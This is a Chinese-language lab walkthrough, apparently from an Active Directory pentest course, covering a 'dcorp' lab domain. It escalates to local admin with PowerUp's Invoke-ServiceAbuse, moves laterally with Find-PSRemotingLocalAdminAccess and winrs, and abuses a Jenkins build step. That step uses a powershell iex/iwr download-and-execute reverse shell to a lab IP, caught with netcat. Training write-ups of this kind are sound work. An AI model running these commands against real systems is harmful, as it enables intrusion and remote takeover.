Objective 5

任务

  1. 攻击部署在dcorp-studentx并且提权到本地管理员
  2. 找到一个本地本地管理员可以登录的域机器
  3. 使用Jenkins的user权限 得到管理员权限 服务部署在172.16.3.11:8080

 

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

 

找提权点

使用winpeas

屏幕截图 2024-09-06 181152

这个很有可能可以使用

 

或者使用PowerUp

. C:\AD\Tools\PowerUp.ps1

枚举

Invoke-AllChecks

屏幕截图 2024-09-06 181942

利用

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName dcorp\student832 -Verbose

屏幕截图 2024-09-06 182151

 

sign out再次登录 就是管理员权限了

屏幕截图 2024-09-06 183354

 

 

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

 

加载Find-PSRemotingLocalAdminAccess.ps1

. C:\ad\Tools\Find-PSRemotingLocalAdminAccess.ps1

 

查找LocalAdmin的对其他机器的许可

Find-PSRemotingLocalAdminAccess

 

屏幕截图 2024-09-06 183706

 

登录到远程主机

winrs -r:dcorp-adminsrv cmd

屏幕截图 2024-09-06 184418

 

 

访问http://172.16.3.11:8000

用户名和密码均为builduser

屏幕截图 2024-09-06 185904

在框中写入 之后save

powershell.exe iex (iwr http://172.16.100.32/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.32 -Port 443

 

打开HFS 并把reverseshell拖入

屏幕截图 2024-09-06 191841

 

监听443端口

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

 

屏幕截图 2024-09-06 192133

点击build now即可

 

屏幕截图 2024-09-06 192223

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片